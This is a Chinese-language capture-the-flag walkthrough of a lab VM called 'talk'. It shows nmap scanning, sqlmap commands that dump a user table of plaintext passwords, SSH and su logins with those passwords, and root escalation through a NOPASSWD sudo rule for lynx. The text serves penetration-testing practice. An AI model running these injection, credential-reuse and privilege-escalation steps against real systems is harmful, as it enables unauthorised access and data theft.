信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p-   192.168.251.47 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 21:58 EDT
Nmap scan report for 192.168.251.47
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    nginx 1.14.2
MAC Address: 08:00:27:3A:33:93 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

80端口

进入页面后,是一个登录界面,第一时间想到的是sql注入,但不知道注入点所以我需要寻找一下注入点在哪里

我自己先注册了一个用户,然后发现类似于注入点的东西

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.251.47/profile.php?userid=8 -dbs
WARNING] GET parameter 'userid' does not seem to be injectable
可惜不是注入点,于是试试登录界面

登录界面,抓包,保留为txt。发现存在注入点

  • 查找库名
sqlmap -r post.txt -dbs -batch

available databases [4]:                                                                                                                                 
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema
  • 查找表名
sqlmap -r post.txt -D chat -tables -batch

Database: chat                                                                                                                                           
[3 tables]
+-----------+
| user      |
| chat      |
| chat_room |
+-----------+
  • 查找列名
sqlmap -r post.txt -D chat -T user -columns  -batch

Database: chat                                                                                                                                           
Table: user
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| email     | varchar(255) |
| password  | varchar(30)  |
| phone     | varchar(255) |
| userid    | int(11)      |
| username  | varchar(30)  |
| your_name | varchar(60)  |
+-----------+--------------+
  • 查找字段内容
sqlmap -r post.txt -D chat -T user -C username,password  -dump  -batch

Database: chat                                                                                                                                           
Table: user
[8 entries]
+----------+-----------------+
| username | password        |
+----------+-----------------+
| pao      | pao             |
| nona     | myfriendtom     |
| tina     | davidwhatpass   |
| jerry    | thatsmynonapass |
| david    | adrianthebest   |
| 123456   | 123456          |
| aaa      | aaa             |
| 123      | 123             |
+----------+-----------------+

之后就结束了

获取shell

这里ssh登录需要注意的是,密码顺序是乱的,需要根据英语提示去输入密码

ssh adrian@192.168.251.47
password:adrianthebest
什么都没有
发现用户nona有user.txt
su nona
password:thatsmynonapass

获得nona的shell,获得user.txt,皆大欢喜

nona@talk:~$ cat user.txt
wordsarelies

提权

sudo -l发现一个无密码命令

nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx

直接提权

sudo -u root /usr/bin/lynx
root@talk:~# cat root.txt
talktomeroot

进入页面后,输入!

知识点

  1. sql注入的使用
  2. lynx提权